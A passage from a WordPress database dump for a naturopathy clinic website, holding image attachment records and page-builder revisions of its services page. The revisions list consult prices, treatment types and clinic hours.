12:47:55','',26,'https://verdenaturopathy.com.au/?p=456',0,'revision','',0),(459,1,'2025-04-09 21:04:33','2025-04-09 13:04:33','','Screenshot_20250409_205525_Instagram','','inherit','open','closed','','screenshot_20250409_205525_instagram','','','2025-04-09 21:04:33','2025-04-09 13:04:33','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2025/04/Screenshot_20250409_205525_Instagram.jpg',0,'attachment','image/jpeg',0),(460,1,'2025-04-09 21:11:25','2025-04-09 13:11:25','','bg-tint','','inherit','open','closed','','bg-tint','','','2025-04-09 21:11:25','2025-04-09 13:11:25','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2025/04/bg-tint.png',0,'attachment','image/png',0),(462,1,'2025-04-09 21:12:59','2025-04-09 13:12:59','','Untitled design','','inherit','open','closed','','untitled-design','','','2025-04-09 21:12:59','2025-04-09 13:12:59','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2025/04/Untitled-design.png',0,'attachment','image/png',0),(474,1,'2025-05-31 11:41:44','2025-05-31 03:41:44','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" custom_padding=\"||0px|||\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Naturopathic consults</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial (60 min) - $190\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span>\n\n<span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span>\n\n<span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $90\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" width=\"100%\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express (20 min) - $65\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" min_height=\"425px\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Stress strategies</span><br /><span style=\"font-family: Montserrat;\">Exercise and movement</span><br /><span style=\"font-family: Montserrat;\">Mindfulness </span><br /><span style=\"font-family: Montserrat;\">Sleep hygiene</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verdenaturopathy.com.au/wp-content/uploads/2025/04/Untitled-design.png\" background_enable_image=\"on\" parallax=\"on\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span>\n<span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span>\n<span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Services','','inherit','closed','closed','','424-revision-v1','','','2025-05-31 11:41:44','2025-05-31 03:41:44','',424,'https://verdenaturopathy.com.au/?p=474',0,'revision','',0),(463,1,'2025-04-09 21:13:12','2025-04-09 13:13:12','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" overflow-x=\"hidden\" overflow-y=\"hidden\" custom_padding=\"||0px|||\" hover_enabled=\"0\" locked=\"off\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Naturopathic consults</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial (60 min) - $185\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span>\n\n<span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span>\n\n<span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $90\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" width=\"100%\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express (20 min) - $65\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\" min_height=\"425px\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" 